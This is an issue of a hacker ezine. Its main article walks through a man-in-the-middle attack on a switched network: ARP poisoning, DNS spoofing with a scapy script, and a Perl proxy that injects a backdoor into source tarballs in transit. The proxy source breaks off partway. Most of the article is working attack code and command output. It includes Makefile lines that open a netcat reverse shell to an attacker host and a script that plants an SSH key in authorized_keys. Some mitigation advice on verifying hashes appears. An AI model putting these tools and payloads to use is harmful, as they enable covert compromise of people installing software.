Copy Link
Add to Bookmark
Report

Aware eZine 03 - Gamma

eZine's profile picture
Published in 
aware eZine
 · 4 years ago

  

[==============================================================================]
mov al,13h ; .aware cr3w sets the correct video m0de - = === == ====]
int 10h ; - = = = = === === == === == = = =========== =]


Too much technology, in too little time.

_..gggggppppp.._
_.go101110000010111010op._
.g1101100101000011010101001001p.
.g1011001101100000100001100110101100p.
.o10111001100101111101010111001110101110o.
.o010011100101110000101111011010000100001100o.
o0001101001100001101101000101100001010011100110o
o111010110010111110000000001101101111110111011101o
o11010100000110001000000101111000011010110010110001o
o0010110011010000000010000100010011011000001110000111o
o011110101101100000110100101010001001100110101101101100o
:10011111001001010001101010110100010011111100010001011000;
1000101111010111001111001110000111010100101111101101100111
:0000110100101111101001101001011110111101010111001100000101;
111011111000000101111101001111001101000110101011011001011001
:111000100111010000111100010000110111011001110101011110000100;
:101111001100100011000001111110110100101101110101101010111010;
10101011000000000111000001111111011100001110100101110010000101
11001001101010100001010110111101101011011110110011111010111011
:101001010101101111000010100010011P"' "Q111100011100101011;
:001001001101010111001110010010101Y Y01010011110111010;
110001111000110100100110010100110 01010100110000111
:00010110000101111010100101010011. .0011110001011001;
10111110011000011111001001110101O O1010111110001000
:11000001100011011011011100000000o,_ _,o0010011100110010;
T110101001110010000110110111000001010000000100011000010P
T0110011000101011101011101000000101111111111001001000P
T00110111111001010010011101110110110001110001101111P
T111001010010111111010101001111000011101111000101P
T1110000110010100101111001111101011000000101011P
`T100100101011001110111100001101011000100011P'
`T11111001011011000110000011100101010111P'
"^1111011011111101010101011101111000^"
"^T01001111111100111100001000P^"
'""^^^T0011101011T^^^""'


Welcome to .aware zine gamma! First and foremost, I'd like to apologize
for not writing an article for this issue, but you've probably had
enough of all that math anyway. // rattle

This release contains even more "nonstandard" content than alpha and
beta, but that's entirely on purpose. We're really glad that people
followed the CFP and sent us the articles we can now proudly present in
totally pr0n ascii. We also want to keep the content this way. It would
be so very cool to see more papers on electronics, chemistry, math, or
any other area of science in the zine - as long as it is both educating
and entertaining.

It was, of course, a pain to get articles at all. Thanks to the authors
of this issue and a big get-off-your-ass to the rest of y'all. I want
YOU to write a kickass paper for zine delta. But hey, fuck the foreplay.

Enjoy the clit.


1 Source Tarball MITM On The Fly Merit Laas
2 Userland API Hooking S0ban
3 The BF Challenge Analysis zshzn
4 Dynamic Programming Teferi
5 Improvised Urea Nitrate Mr.X
6 outr0 rattle


[==============================================================================]
[----------------------[ Source Tarball MITM On The Fly ]----------------------]
[==============================================================================]


_.d####b._
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/´_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########>"<######
*#########( )####*
##########>.<##### by Merit Laas
################
*############*
"T######T"


--[ 00 ]----------------------------------------------[ Table Of Contents ]-----

(1) Intro
(2) MITM on a switched network
(2.1) ARP spoofing (poisoning)
(2.2) ICMP Redirect
(2.3) DNS spoofing
(2.4) More esoterik ideas
(3) An example MITM
(3.1) Example MITM
(3.2) What this looks like on the network
(3.3) How to mitigate MITM
(3.4) Secure "protocol"
(4) Infecting Tarballs
(4.1) Necessary pieces
(4.2) Example MITM pt2
(4.3) shell sessions & packet traces
(5) Conclusion

Appendixes:

(A) network layout
(B) dns spoofer



--[ 01 ]----------------------------------------------------------[ Intro ]-----
( why, how and what we are going to do )

This document describes an implementation of a Man In The Middle attack.
Our victim is on the same network segment with us and we know that they are
likely to download one or more source tarballs to install software on their
machine. We are going to try to MITM their http connection and attempt to
inject a backdoor into the tarball while in flight to the victim.

The idea to do this came to me during a wargame. The other team had their
machine reasonably well secured in terms of packages - none had any
publicly known vulnerabilities. Not wanting to just give up, I decided to
target the meatware - admins are notorious for being sloppy. Who bothers
to check those md5sums anyway?

As this attack was intended to be used in a wargame, a bit of care has been
taken for it to work in secured environments and also for it to fly under
the radar.


--[ 02 ]-------------------------------------[ MITM on a switched network ]-----

There are at least 3 options of how to pull off an http MITM on a switched
network. All of them require that the attacker somehow tricks the victim to
route connections through a machine under the attacker's control.

The first two methods - ARP spoofing and ICMP redirect - involve tricking
the victim on the IP protocol level. The third method - DNS spoofing -
requires relatively low effort and is fairly stealthy. It only requires
that ARP poisoning is working to some extent. A few less likely methods
are also presented for inspiration.


----( 2.1 )------------------------------------[ ARP spoofing (poisoning) ]-----

ARP (Address Resolution Protocol) is used to find the link-layer address
of a network address, which mostly means finding the MAC address to reach
an IP. Here is an example ARP conversation:

23:58:10.127121 arp who-has 10.10.0.2 tell 10.10.0.1
23:58:10.127312 arp reply 10.10.0.2 is-at 00:23:02:9a:c3:1c

The tcpdump output above pretty much sums it up: Seems that 10.10.0.1 wants
to talk to 10.10.0.2 and thus asks "who has 10.10.0.2? tell 10.10.0.1!".
10.10.0.2, as a good network citizen must answer with her MAC address:
"10.10.0.2 is at 00:23:02:9a:c3:1c".

ARP spoofing basically means lying about your identity. The attacker has to
react fast and reply the "who-has" with a fake "is-at" faster than the real
owner of the IP (or - more commonly - the attacker would just flood the
network with the fake answer even before the victim asks). Thus, to achieve
a good position for a MITM, an attacker would tell it's victim that it is
the default gateway router and tell the default gateway router it is the
victim. That way, the attacker positions itself between the victim and the
rest of the world, making it possible to intercept and possibly rewrite
any packets passing by.

However, it is possible to fix the MAC address entries in kernel to static
values, which people may do if they suspect some MITM attempts are coming
their way. And during wargames, everyone is very suspicious of everything.

It is worth noting though, that one can only lock the ARP on a machine they
manage. So, if our victim would lock the MAC of the default gateway on
their box, the default gateway would still periodically resolve it's IP
address with ARP. This means, that we have the possibility of hijacking the
streams towards the victim, from the gateway.

It is definitely possible to do a MITM rewriting only one direction of the
connection, but is a bit complicated (we need to rewrite packets on the
transport layer - TCP sequence numbers) and we try to avoid complexity if
we can. Also, ARP spoofing may be noisy if someone is listening.


----( 2.2 )-----------------------------------------------[ ICMP Redirect ]-----

ICMP redirect is meant to be sent by routers to indicate that clients
should use another router to reach a particular host or network. It's use
can be seen from the following commented packet trace:

Client sends an ICMP echo request (ping) to another C class:
00:22:26.125017 00:01:02:03:04:05 > 05:04:03:02:01:00,
ethertype IPv4 (0x0800), length 98:
192.168.128.100 > 192.168.77.5:
ICMP echo request, id 29195, seq 2, length 64

The default router answers with an ICMP redirect to indicate a different
router should be used for this host:
00:22:26.126918 05:04:03:02:01:00 > 00:01:02:03:04:05,
ethertype IPv4 (0x0800), length 126:
192.168.128.1 > 192.168.128.100:
ICMP redirect 192.168.77.5 to host 192.168.128.151, length 92
192.168.128.100 > 192.168.77.5:
ICMP echo request, id 29195, seq 2, length 64

The client resolves the MAC of the new router (192.168.128.151) it is
redirected to, being answered "0a:0b:0c:0d:0e:0f":
00:22:26.128944 00:01:02:03:04:05 > Broadcast,
ethertype ARP (0x0806), length 42:
arp who-has 192.168.128.151 tell 192.168.128.100
00:22:26.130970 0a:0b:0c:0d:0e:0f > 00:01:02:03:04:05,
ethertype ARP (0x0806), length 60:
arp reply 192.168.128.151 is-at 0a:0b:0c:0d:0e:0f

Apparently, tries one more time with the original router
00:22:27.125001 00:01:02:03:04:05 > 05:04:03:02:01:00,
ethertype IPv4 (0x0800), length 98:
192.168.128.100 > 192.168.77.5:
ICMP echo request, id 29195, seq 3, length 64

Is redirected again:
00:22:27.126880 05:04:03:02:01:00 > 00:01:02:03:04:05,
ethertype IPv4 (0x0800), length 126:
192.168.128.1 > 192.168.128.100:
ICMP redirect 192.168.77.5 to host 192.168.128.151, length 92
192.168.128.100 > 192.168.77.5:
ICMP echo request, id 29195, seq 3, length 64

This time the client complies and uses the new gateway. Notice, that the
destination MAC has changed to the one that was resolved by ARP earlier:
00:22:28.125001 00:01:02:03:04:05 > 0a:0b:0c:0d:0e:0f,
ethertype IPv4 (0x0800), length 98:
192.168.128.100 > 192.168.77.5:
ICMP echo request, id 29195, seq 4, length 64

To redirect a victim in this way, the attacker needs to know the beginning
of an original packet sent by the victim - the victim must be able to match
the received redirect to a packet it knows it has sent.

One way to get such a packet is initiating a connection from the outside.
If the victim answers (the port is not firewalled), we get an outgoing
packet from the victim sent directly to us.

However, while at least the linux kernel comes with redirection enabled by
default, it can be easily disabled and would probably be disabled in a
wargame. Redirects are also visible it packet dumps and thus not that
stealthy.


----( 2.3 )------------------------------------------------[ DNS spoofing ]-----

DNS spoofing is pretty much the same idea as ARP spoofing, only at another
level. When the victim makes a DNS request for a domain name, the attacker
can answer with it's own IP, making the victim talk straight to the
attacker - no further trickery involved.

For DNS spoofing to work, we have to know when and what the victim tries to
resolve in order to return a bogus answer. DNS is not sent broadcast as ARP
so we can't just listen in on it. So we need to combine DNS spoofing with a
little bit of ARP poisoning.

Remember how we decided plain ARP poisoning wouldn't work as the victim
probably has it's ARP table locked? And that the router doesn't? And that
it would be complex to MITM that way? Well, it would be pretty simple if we
only needed to rewrite the DNS replies that way. So what we can do is ARP
poison just the router's ARP table and be on the path of arriving DNS
replies - ready to rewrite them.

There is a slightly theoretical issue of ambiguity when the client has
resolved a number of domains via DNS and we have given a single answer to
all of them. How do we know which server the client wants to connect to
when it sends us a packet? For HTTP it is easy, we can use the
"Host: goatporn.com" header. But if the client sends a packet to TCP port
1337? Forwarding the packet to the domain they resolved most recently may
be the best option, but there is no guarantee that the packet isn't really
meant for a domain resolved earlier.

We could probably claim a number of IP addresses on the local network to
use as a pool to identify the sites we have sent a bogus DNS answer for and
forward the victim's connections based on the particular address they are
connecting to. But that seems a bit complicated.

IMO, the sanest decision would be to play the ignorant bliss card and just
forget about it. Especially in that particular setting - the Internet
connection in the wargame was pretty limited and didn't allow anything but
outbound port 80 (http) requests, so the problem wouldn't even rise. You
may need to consider the consequences in different setups though.


----( 2.4 )--------------------------[ More esoterik ideas (less likely ) ]-----

There are a few other options listed - to spark the imagination.

----( 2.4.1 )----------------------------------------------( MAC tables )-----

Switches keep track of MAC addresses connected to their ports in order to
send packets only to the port where the destination is connected to.
Sometimes they are willing to update their records of where a certain MAC
is connected after receiving a single packet with the said MAC as source
from another port. So, if we sent a packet with the router's MAC, the
switch would start sending all the packets destined to the router to our
box instead. Apparently, the switch thinks the router's network interface
has moved to our network port.

This is only temporary though, as a single packet from the router will
change the MAC table back to it's original. Also, there is the problem that
you need to somehow have connectivity to the Internet while you are cutting
your default gateway off the network. For a MITM to work you have to be
able to connect to the remote end too - otherwise there isn't anything to
be Man In The Middle of.

We could try to send packets to the router with the broadcast MAC and keep
on flooding the network with the router's source MAC to keep the tables as
we want them. It doesn't sound like a very robust solution and there's a
good chance it doesn't work at all (I'm not crazy enough to try it).

Alternatively, we could use another router for our Internet traffic, but
that would require a second network interface in another network. It's
not as implausible as it may sound, as many office-like setups have both
wired and wireless connections available.

----( 2.4.2 )--------------------------------------------( Own a router )-----

If you can own any machine on the victims uplink, you can redirect any
traffic whichever way you wish (for most OSes). The problem with this
approach is that ISP routers are most likely secured better than your
average boxes and just owning them out of the blue may be implausible.

Still, it's worth consideration.

----( 2.4.3 )---------------------------------( Routing protocol mayhem )-----

Most routers (and switches) use various routing protocols to decide on the
topology of the network and how the packets should be forwarded. For
switches, it's STP, for routers on smaller network RIP, OSPF or ISIS, for
internetwork routers BGP. If you can talk any of these on your network it
may likely present avenues to redirect traffic the way you need.


--[ 03 ]------------------------------------------------[ An example MITM ]-----

"Too much showing off fancy ideas and too little command prompts and packet
traces," I hear you saying? As we have decided to use the DNS spoofing
approach, it seems like a good time to get our hands dirty with the
Forbidden Commands (in Germany, at least).

The machines we are going to use for examples are "fish" (attacker) and
"chips" (victim). See appendix A for a description of the network.


----( 3.1 )------------------------------------------------[ Example MITM ]-----
( what happens, when, how, commands )

First, to meet the assumed criteria for the victim we must secure it
against ARP spoofing and ICMP redirection. We can do it like this:

chips:~# ip n
192.168.255.1 dev eth0 lladdr 00:ff:81:58:74:a4 REACHABLE
chips:~# ip n c 192.168.255.1 dev eth0 lladdr 00:ff:81:58:74:a4
chips:~# ip n
192.168.255.1 dev eth0 lladdr 00:ff:81:58:74:a4 PERMANENT
chips:~# cat /proc/sys/net/ipv4/conf/*/accept_redirects
1
1
1
1
chips:~# for f in $(ls /proc/sys/net/ipv4/conf/*/accept_redirects); do
echo 0 > $f
done
chips:~# cat /proc/sys/net/ipv4/conf/*/accept_redirects
0
0
0
0

That done, we can move to the attacking position. First, we need to set up
IP forwarding on our attacking box, so that our ARP poison doesn't cut the
victim's connections to the Internet:

fish:~# echo 1 > /proc/sys/net/ipv4/conf/all/forwarding
fish:~# cat /proc/sys/net/ipv4/conf/all/forwarding
1

This sets the linux kernel up to forward the packets between our victim and
the gateway on the network. However, we don't want to forward DNS replies as
we are going to fake those:

fish:~# iptables -I FORWARD -p udp --sport 53 -j DROP

Then, ARP poison the router into thinking we are the victim box. We can use
arpspoof for that:

fish:~# arpspoof -i eth0 -t 192.168.255.1 192.168.255.134
52:54:0:12:34:5 0:ff:81:58:74:a4 0806 42:
arp reply 192.168.255.134 is-at 52:54:0:12:34:5
52:54:0:12:34:5 0:ff:81:58:74:a4 0806 42:
arp reply 192.168.255.134 is-at 52:54:0:12:34:5
52:54:0:12:34:5 0:ff:81:58:74:a4 0806 42:
arp reply 192.168.255.134 is-at 52:54:0:12:34:5
...

Next, we set up a DNS MITM with a custom scapy script (see appendix B):

fish:~# ./dnsmitm.py 192.168.255.133 52:54:00:12:34:06

And lastly, try to ping www.google.com on the victim box:

chips:~# ping -c 1 www.google.com
PING www.l.google.com (192.168.255.133) 56(84) bytes of data.
64 bytes from 192.168.255.133: icmp_seq=1 ttl=64 time=7.88 ms

--- www.l.google.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 7.883/7.883/7.883/0.000 ms

As you can see from the output of ping, the MITM worked and we directed
the victim to our box instead of the "more official" official google
servers (yep, our google server isn't official).

The following piece from dnsmitm.py output describes what it did:

Before:
rrname : DNSStrField = 'www.l.google.com.' ('')
type : ShortEnumField = 1 (1)
rclass : ShortEnumField = 1 (1)
ttl : IntField = 198L (0)
rdlen : RDLenField = 4 (None)
rdata : RDataField = '66.249.91.103' ('')

After:
rrname : DNSStrField = 'www.l.google.com.' ('')
type : ShortEnumField = 1 (1)
rclass : ShortEnumField = 1 (1)
ttl : IntField = 198L (0)
rdlen : RDLenField = 4 (None)
rdata : RDataField = '192.168.255.133' ('')


----( 3.2 )-------------------------[ What this looks like on the network ]-----

To see the whole picture, not just some imaginary command prompts, here is
a (commented) packet trace from the victim machine during the ping:

The victim resolves www.google.com from the router 192.168.255.1. There are
no ARP queries as the router's MAC address is made permanent in kernel:
20:09:46.681723 52:54:00:12:34:06 > 00:ff:81:58:74:a4,
ethertype IPv4 (0x0800), length 74:
(proto: UDP (17), length: 60)
192.168.255.134.1026 > 192.168.255.1.53:
32428+ A? www.google.com. (32)

The answer comes in directing to the attacker server. Notice, that also the
source MAC is spoofed to be more inconspicuous:
20:09:47.186746 00:ff:81:58:74:a4 > 52:54:00:12:34:06,
ethertype IPv4 (0x0800), length 494:
(proto: UDP (17), length: 480)
192.168.255.1.53 > 192.168.255.134.1026:
32428 4/7/0
www.google.com. CNAME www.l.google.com.,
www.l.google.com. A 192.168.255.133,
www.l.google.com. A 192.168.255.133,
www.l.google.com. A 192.168.255.133 (452)

The usual ping echo request/reply:
20:09:47.194927 52:54:00:12:34:06 > 52:54:00:12:34:05,
ethertype IPv4 (0x0800), length 98:
(proto: ICMP (1), length: 84)
192.168.255.134 > 192.168.255.133:
ICMP echo request, id 59916, seq 1, length 64
20:09:47.206051 52:54:00:12:34:05 > 52:54:00:12:34:06,
ethertype IPv4 (0x0800), length 98:
(proto: ICMP (1), length: 84)
192.168.255.133 > 192.168.255.134:
ICMP echo reply, id 59916, seq 1, length 64

The attacker resolving victim's MAC address by ARP:
20:09:52.230244 52:54:00:12:34:06 > 52:54:00:12:34:05,
ethertype ARP (0x0806), length 42:
arp who-has 192.168.255.133 tell 192.168.255.134
20:09:52.250149 52:54:00:12:34:05 > 52:54:00:12:34:06,
ethertype ARP (0x0806), length 60:
arp reply 192.168.255.133 is-at 52:54:00:12:34:05

The victim performs a reverse DNS query, which comes back empty:
20:09:52.256212 52:54:00:12:34:06 > 00:ff:81:58:74:a4,
ethertype IPv4 (0x0800), length 88:
(proto: UDP (17), length: 74)
192.168.255.134.1026 > 192.168.255.1.53:
20436+ PTR? 133.255.168.192.in-addr.arpa. (46)
20:09:52.352026 00:ff:81:58:74:a4 > 52:54:00:12:34:06,
ethertype IPv4 (0x0800), length 188:
(proto: UDP (17), length: 174)
192.168.255.1.53 > 192.168.255.134.1026:
20436 NXDomain* 0/1/0 (146)

Of course a clever administrator would notice that they are talking to a
google server which is supposedly on the local network. The attack,
however, is in no way limited to the local network and we'll mount a less
obvious MITM in a little while.


----( 3.3 )----------------------------------------[ How to mitigate MITM ]-----

Even though we only forced the client to ping our box instead of the
intended target it clearly shows that it is not that technically demanding
to execute such an attack - even if some care has been taken on the OS
level to make it harder.

However, there is a way to make all of this impossible: by utilizing
cryptography. Use https instead of http, ssh instead of telnet and check
the md5sums of the files you download. Of course, for all these methods
there must be a secure channel to verify the tokens - you must know whether
to trust the SSL certificate, RSA key fingerprint or any particular md5sum
(in fact, rattle would very much like you all to know, that you should not
trust MD5 at all and possibly not SHA either).

Oftentimes we are only limited to one network connection so the only
available security decision is usually to blindly trust a key the first
time real quick and use that key to secure any further communications. This
reduces the window of opportunity for an attacker to just a few packets.

However, you must not do this if the computer system REALLY must be secure.
It may stop the majority of opportunistic attacks, but if you also fear a
dedicated attacker who is willing to wait for their chance, they will just
MITM your initial key download. Call a friend abroad and ask them to check
the key id or hash over their connection. It is far less likely or
plausible for an attacker to be also MITMing on the traffic of your
arbitrary friends.


----( 3.3 )-------------------------------------------[ Secure "protocol" ]-----

For the sake of using similar terms, We'll be calling "verifying an md5sum
of your downloaded package" a "protocol". This is so that we could compare
it to HTTPS and SSH without feeling stupid. Let's look at the protocol for
a little:

Technically, it should be hard to attack. If the md5sum of the package you
are downloading is known, then you can check the known good md5sum against
your downloaded package. If there's a difference, there's something wrong.

There are three assumptions here though. First - it is assumed we somehow
know the authentic md5sum while in reality we usually have to fetch the it
on the same insecure link we are fetching the package from. If an attacker
can modify the package, she can also modify the md5sum. Second - we assume
that MD5 collisions are hard to find which may not be the case. Third and
IMO the most fatal as it goes beyond the hash algorithm and security of
the network connection - a person is expected to actually check the hash.
How often do you check the hash of your downloads? I bet not that often.

Verifying downloaded packages is an important aspect of a package
management system for any linux distro and luckily they have got it
reasonably well (afaik). The key they use to sign the packages is on an ISO
so the only reasonable time to change it is while you download the ISO. If
you get it via mail burned on a CD, they would have to attack the snail
mail system, which is I assume is beyond all but the most determined
attackers who may be more likely to threaten to cut off your body parts if
you don't comply with their demands and unless you are the type that always
has a few thugs hanging around because they are "generally useful", you
wouldn't be worrying about those kinds of attackers.


--[ 04 ]---------------------------------------------[ Infecting Tarballs ]-----

Thus far we have established that there is a good chance of executing a
successful MITM attack against a victim on your local network. We have
reasoned that automatic schemes that use good cryptographic solutions are
likely hard to crack and have decided to attack the process of fetching
source packages, where the meatware has a nice opportunity to screw up by
not checking the integrity of their download.


----( 4.1 )--------------------------------------------[ Necessary pieces ]-----

Let's go through the process of installing a tarball. It should usually go
pretty much like this:

1. admin executes wget http://good-server.com/ball.tar.gz
2. machine resolves the default gateway by ARP and vice versa
3. machine resolves 'good-server.com' by DNS
4. machine makes a HTTP request for the ball.tar.gz
5. data flows back
6. tar xzf ball.tar.gz; cd ball-1.0/
7. ./configure; make; make install

We can attack the 3rd step to point the victim to a server of our choosing.
That means that at the 4th step the victim would connect to a machine under
our control. We can forward the request to the right server by the Host
header in HTTP/1.1 requests and thus control the 5th step - we know where
to get the expected data from but are in a position to make modifications
to it.

Looking further along the "wget path" the most easily attacked bit seems
to be either the './configure' or the 'make' part. As some packages might
not contain a configure script or some admins might not call 'make
install', it would be best if we could attack the 'make' part.

What we would need to do is to modify the Makefile to do something
naughty, preferably without any obvious side-effects. My best solution
is to prepend something like this to a Makefile:

ZXC := $(shell nc evilhost 12345 -e /bin/sh)

And have the evilhost host a small script on 12345 that would get the
username and install a ssh key for the user.

Now, to actually infect a tarball, we have to change the content
transmitted at step 5. In order to change it, we have to unpack the
original tarball, parse the tar format, look for Makefiles in the data
stream, prepend our evil variable declaration to them and repack the
tarball. All of that has to happen on the fly as the victim expects the
usual speedy http download.

Component-wise, we need a web proxy that would do the injection part, a
simple inetd server to serve the infecting shell script to our connect-
back shell and of course the MITM component, which we already have (the
same solution we used to redirect the ping to google).

I'll use the magic of writing a paper now, and pretend that all the
development work took as long as writing this sentence.


----( 4.2 )--------------------------------------------[ Example MITM pt2 ]-----
( from where we left off )

The MITM will happen in a similar setting. Only difference is, that we
spoof another IP with dnsmitm (a public one, to avoid suspicion):

fish:~# ./dnsmitm.py 82.131.30.120 52:54:00:12:34:06

And on that machine, 82.131.30.120 (aka "windolik"), we run our tar
injecting proxy (see appendix C):

windo@windolik:~/tarinject$ ./proxy.pl

and on "fish", we also run a netcat that will provide an evil shell script
to the rather general reverse shell we inject to the tarball (word
wrapped to fit):

fish:~# echo 'mkdir -p $HOME/.ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQ
EAr185zP6O1tsdpj+salt4oWZX2zLIj7xjTAQL2T9t7XPuMzWrURuGT7ykWI3XG3eYec5tyzJGD
z0JkzcCWF0dlT8eurl7wWbQCSFrHe30WOoSOYSQthp/t1aIjapmkDAL1tkFYTAXGN3iBnl1bsaO
8BWreBNwp2wk96XoZc+tHSPCjE6U91wjHrFUaQhw8n6WgqtUQxQbJivXjmW9YDVBs+1t7tSUteI
UWMOaL5ifcaI1mysIuNlY/Dt2ArI6Wtka/+FzqEKVFnqej+QZmuIHhUP9uDwwzGB0woo1NDClyl
qcaFwOVfRH9fHPAxV4aMnFqTZHiXs97YgCGRZFXEruOQ== root@fish" >> $HOME/.ssh/aut
horized_keys; echo $LOGNAME; echo $USER' | nc -l -p 8000 -v -n -q 1

It installs an ssh key and reports back the username who ran it.

Having done that, we can wait for the victim to decide he needs to install
a package. For simplicity, I used a very small tarball that only contains
a Makefile with the following contents:

all: binary
binary:
touch binary


----( 4.3 )------------------------------[ shell sessions & packet traces ]-----

To get an idea what such an attack would yield, here is a sample session
from the victim's perspective:

chips:~# wget http://p6drad-teel.net/~windo/jama/bla.tar.gz
--00:30:16-- http://p6drad-teel.net/~windo/jama/bla.tar.gz
=> `bla.tar.gz'
Resolving p6drad-teel.net... 82.131.30.120
Connecting to p6drad-teel.net|82.131.30.120|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified

[ <=> ] 221 575.52B/s

00:30:27 (575.08 B/s) - `bla.tar.gz' saved [221]

chips:~# tar xzf bla.tar.gz
chips:~# make
touch binary
chips:~#

There is not much that would give away the attack if the victim does not
either:
* Know the right IP for p6drad-teel.net (or whichever host) by heart
* Check the contents of the Makefile
* Check the md5sum of the tarball

The session of the attacker, installing the ssh key:

fish:~# echo 'mkdir -p $HOME/.ssh; echo "ssh-rsa AAAAB3 ...
listening on [any] 8000 ...
connect to [192.168.255.133] from (UNKNOWN) [192.168.255.134] 3540
root
root
fish:~# ssh root@192.168.255.134
Last login: Tue May 13 00:15:33 2008 from 192.168.255.133
Linux clean-box 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
chips:~#

Therefore we see that not verifying the integrity of your downloads may have
a very bad impact on your day.

To have a complete overview of what is going on, here is a partial
(commented) packet trace of the attack up the point of planting the ssh
key (from the perspective of the victim):

First, wget tries to resolve an IPv6 address (AAAA record), fails and
gets the IPv4 address (A record).
00:30:16.089893 52:54:00:12:34:06 > 00:ff:81:58:74:a4,
ethertype IPv4 (0x0800), length 75:
(proto: UDP (17), length: 61)
192.168.255.134.1033 > 192.168.255.1.53:
55053+ AAAA? p6drad-teel.net. (33)
00:30:16.168405 00:ff:81:58:74:a4 > 52:54:00:12:34:06,
ethertype IPv4 (0x0800), length 158:
(proto: UDP (17), length: 144)
192.168.255.1.53 > 192.168.255.134.1033:
55053* 0/1/0 (116)
00:30:26.416774 52:54:00:12:34:06 > 00:ff:81:58:74:a4,
ethertype IPv4 (0x0800), length 75:
(proto: UDP (17), length: 61)
192.168.255.134.1033 > 192.168.255.1.53:
64115+ A? p6drad-teel.net. (33)
00:30:26.535107 00:ff:81:58:74:a4 > 52:54:00:12:34:06,
ethertype IPv4 (0x0800), length 250:
(proto: UDP (17), length: 236)
192.168.255.1.53 > 192.168.255.134.1033:
64115* 1/3/0 p6drad-teel.net. A 82.131.30.120 (208)

Then it initiates a TCP connection to a machine under our control and makes
the HTTP request:
00:30:26.538659 52:54:00:12:34:06 > 00:ff:81:58:74:a4,
ethertype IPv4 (0x0800), length 74:
(proto: TCP (6), length: 60)
192.168.255.134.2076 > 82.131.30.120.80: SYN
00:30:26.619451 52:54:00:12:34:05 > 52:54:00:12:34:06,
ethertype IPv4 (0x0800), length 74:
(proto: TCP (6), length: 60)
82.131.30.120.80 > 192.168.255.134.2076: SYN-ACK

... a bunch of downloading data

A bit later, when the Makefile is executed, it fetches the evil shell
script to execute it:
00:31:09.631978 52:54:00:12:34:06 > ff:ff:ff:ff:ff:ff,
ethertype ARP (0x0806), length 42:
arp who-has 192.168.255.133 tell 192.168.255.134
00:31:09.637132 52:54:00:12:34:05 > 52:54:00:12:34:06,
ethertype ARP (0x0806), length 60:
arp reply 192.168.255.133 is-at 52:54:00:12:34:05
00:31:09.637795 52:54:00:12:34:06 > 52:54:00:12:34:05,
ethertype IPv4 (0x0800), length 74:
(proto: TCP (6), length: 60)
192.168.255.134.3540 > 192.168.255.133.8000: SYN
00:31:09.645537 52:54:00:12:34:05 > 52:54:00:12:34:06,
ethertype IPv4 (0x0800), length 74:
(proto: TCP (6), length: 60)
192.168.255.133.8000 > 192.168.255.134.3540: SYN-ACK


--[ 05 ]--------------------------------[ Conclusion: check those MD5sums ]-----

For the short conclusion: check the md5sums or sha1sums or whichever
hashes of those downloads.

While it is possible to construct blobs with the same md5 hashes, it is
still relatively hard to find a collision without specially preparing the
packages first, definitely hard to do on the fly. And whenever possible
(like when remotely administrating a machine), use different links for
downloading and hash verification.

Also keep in mind, that while digital signatures and CA's and so forth
are cool, doing something like:

gpg --recv-keys KEYID

can be easily intercepted by an attacker on your local network. Choosing
to trust a new SSL certificate is just as dangerous.

For the more general conclusion: be conscious of the fact that a human on
your system can easily break all security. Always think of how you could
screw up in your every-day work and avoid doing it.


---[ Appendix A ]----------------------------------------[ network layout ]-----

The machines in use for the examples are "fish" and "chips":

fish: IP: 192.168.255.133
chips: IP: 192.168.255.134

A bit less important machines:

router: IP: 192.168.255.1
windolik: IP: 82.131.30.120

"fish" and "chips" are set up in a same network segment together with a
router that connects them to the rest of the world:

/----------\
| windolik |
\----------/
|
THE INTERNET
|
/----------\
| router |
\----------/
|
/----------\
| SWITCH |
\----------/
| |
/------\ /-------\
| fish | | chips |
\------/ \-------/

"fish" and "chips" are virtual, emulated by QEMU, as is the switch,
emulated by vde_switch of VDE (Virtual Distributed Ethernet). "windolik" is
a real machine on the Internet. All machines run a version of Debian Linux.


---[ Appendix B ]-------------------------------------------[ dns spoofer ]-----

#!/usr/bin/python

from scapy import *
import sys

if len(sys.argv) != 3:
print "Usage: dnsmitm.py <ip> <real-mac>"
# the answer to all DNS queries
spoofit = sys.argv[1]
# the real mac of our victim
realmac = sys.argv[2]

# mitm loop
while True:
# get a dns packet
packet = sniff(count=1, lfilter=lambda x: x.haslayer("UDP") and \
x.getlayer("UDP").sport == 53)[0]
#ls(packet)
# TODO: for HTTP/1.0 requests (without Host:), write this someplace our
# webmitm can use as a last resort
originalhost = packet.qd.qname
# rewrite the answer
#print "Before: "
#ls(packet.an)
an = packet.an
while an:
# domain names end in "."
if an.rdata[len(an.rdata)-1] != "." and an.type == 1:
an.rdata=spoofit
an = an.payload
#print "After: "
#ls(packet.an)
# modify hw-dst
packet.dst = realmac
# needed to calculate the correct checksums
packet.getlayer("UDP").chksum=None
packet.getlayer("IP").chksum=None
packet.getlayer("UDP").len=None
packet.getlayer("IP").len=None
# pass the modified answer
print "spoofed one!"
sendp(packet)


Appendix C - tar infector source

#!/usr/bin/perl

use HTTP::Daemon;
use HTTP::Status;
use Net::HTTP;
use POSIX;
use IPC::Open2;
use IO::Select;
use Time::HiRes qw( usleep );

# infector
BEGIN {
my $uncompr_sel, $uncompr_pid, $uncompr_out, $uncompr_in;
my $compr_sel, $compr_pid, $compr_out, $compr_in;
my $c, $inject, $tarbuf, $tarofs, $tarskipto;
my $injecting;
# added to makefiles
# adds new pseudotarget, can run in background
# runs a shell expansion, can't go into background AFAIK
my $evilcode = "XKCD := \$(shell nc 192.168.255.133 8000 -w 1 -e /bin/sh)\n";

# setup the pipes
sub init_inject {
# connection to client (victim)
$c = shift;
# URI being downloaded
$uri = shift;
# for gzipped tar
if ($uri =~ /tar\.gz$/ || $uri =~ /tgz$/) {
print "Opening compressors: GZIP\n";
$uncompr_pid = open2($uncompr_in, $uncompr_out, "gunzip");
$uncompr_sel = IO::Select->new($uncompr_in);
$compr_pid = open2($compr_in, $compr_out, "gzip -f -");
$compr_sel = IO::Select->new($compr_in);
$inject = 1;
print "Opened compressors\n";
}
# for bzip2d tar
elsif ($uri =~ /tar\.bz2$/) {
print "Opening compressors: BZIP2\n";
$uncompr_pid = open2($uncompr_in, $uncompr_out, "bunzip2");
$uncompr_sel = IO::Select->new($uncompr_in);
